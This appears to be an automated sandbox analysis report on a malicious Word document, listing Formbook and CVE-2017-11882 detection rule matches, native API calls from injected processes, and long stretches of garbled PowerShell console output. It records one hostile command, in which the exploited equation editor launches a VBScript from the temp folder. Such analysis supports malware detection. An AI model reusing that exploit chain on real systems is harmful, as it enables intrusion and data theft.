          Source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.695460861.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.533315726.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.523205518.0000000007F69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.695385145.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.576020487.0000000006620000.00000004.00000001.sdmp, type: MEMORYMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.493359137.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.533246688.0000000000290000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 007F3F92 appears 108 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 007ADF5C appears 107 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 007F373B appears 238 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 0081F970 appears 81 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 007AE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 01F5E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 01FA3F92 appears 108 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 01FA373B appears 238 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 01FCF970 appears 81 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 01F5DF5C appears 118 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A410 NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A490 NtClose,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A35B NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A07AC NtCreateMutant,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_007A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0079FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F501D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F51148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F5010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F510D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F50078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F50060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F50048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F51930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F51D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F50C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01F4FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009A410 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009A490 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_0009A35B NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E4A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E49BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E4A042 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 13_2_01E49BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Q-18072 QPHN .docJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@12/12@6/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: explorer.exe, 0000000C.00000000.506291224.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{582F6110-BFFF-4A00-AFCC-377131C85BB6}.tmp.0.drOLE document summary: edited time not present or 0
          Source: RFQ-18072 QPHN .docReversingLabs: Detection: 15%
          Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\cscript.exeConsole Write: .................................3e.....(.P.....................T.......m.......................................................`.+.......+.....
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............................................`I.........v.....................K..............j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............U.4k....0...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.2.............}..v............0.................T.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....%......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x&..............................}..v.....&......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....-......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....5......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x6..............................}..v.....6......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....=......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x>..............................}..v.....>......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....E......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....xF..............................}..v.....F......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....M......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....xN..............................}..v.....N......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....U......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....xV..............................}..v.....V......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....]......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x^..............................}..v.....^......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....e......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....xf..............................}..v.....f......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....m......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....xn..............................}..v.....n......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....u......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....xv..............................}..v.....v......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....}......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x~..............................}..v.....~......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s.................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v............0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....%......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x&..............................}..v.....&......0...............(.T.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k......T.............................}..v.....-......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................U.4k....x...............................}..v............0...............(.T.............................
